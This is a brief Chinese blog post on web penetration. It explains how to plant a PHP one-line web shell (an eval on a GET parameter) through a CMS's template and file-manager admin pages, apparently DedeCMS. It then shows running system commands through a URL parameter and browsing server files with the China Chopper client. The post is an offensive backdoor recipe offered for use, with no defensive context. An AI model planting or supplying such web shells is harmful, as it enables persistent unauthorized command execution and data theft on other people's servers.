您的位置:首页 > 编程语言 > PHP开发

web渗透——PHP一句话插入

2017-10-20 10:26 211 查看

一句话:

<?php @eval($_GET['as']); ?>    //as是形式参数

位置:

1、模块——模块管理——文件管理器

2、模板——模板管理——标签源码管理

3、、、

进入,选择.PHP文件,插入一句话

使用:

1、在网页上,、、、/dede/ad_add.php?as=system('dir');    //可以显示该目录下的文件、文件大小以及字节数

2、利用工具(菜刀),可以详细浏览目录下的文件
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  漏洞 web PHP